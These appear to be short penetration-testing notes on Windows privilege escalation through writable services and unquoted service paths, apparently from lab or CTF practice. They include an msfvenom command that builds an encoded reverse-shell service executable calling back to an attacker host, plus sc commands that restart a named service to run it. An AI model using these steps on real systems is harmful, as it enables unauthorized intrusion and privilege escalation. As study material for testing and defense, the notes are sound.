windows
Enumeration
run scripts such as PowerUp (PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations.) and Winpeas.
Writable and restartable services

in this example we can replace ASCService.exe
with a payload and get a root reverse shell.
msfvenom -p windows/shell_reverse_tcp LHOST=CONNECTION_IP LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o ASCService.exe
then restart the service:
C:\Program Files (x86)\IObit\Advanced SystemCare>sc stop AdvancedSystemService9
[output...]
C:\Program Files (x86)\IObit\Advanced SystemCare>sc start AdvancedSystemService9
Unquoted service path

we can exploit this vulnerability by putting a payload named Advanced.exe
in C:\Program Files (x86)\IObit\
.
then again restart the service and the payload gets executed.
C:\Program Files (x86)\IObit\Advanced SystemCare>sc stop AdvancedSystemService9
[output...]
C:\Program Files (x86)\IObit\Advanced SystemCare>sc start AdvancedSystemService9
explenation at https://juggernaut-sec.com/unquoted-service-paths/.
eg.
if we have a service at C:\Program Files\Juggernaut Prod\Production Tools\Juggernaut.exe
Since there are spaces and no quotes in the file path to the service executable, the service will attempt to start by treating each part of the folder name before the space as an executable that resides in the previous folder, like so:
C:\Program.exe
C:\Program Files\Juggernaut.exe
C:\Program Files\Juggernaut Prod\Production.exe
C:\Program Files\Juggernaut Prod\Production Tools\Juggernaut.exe
Last updated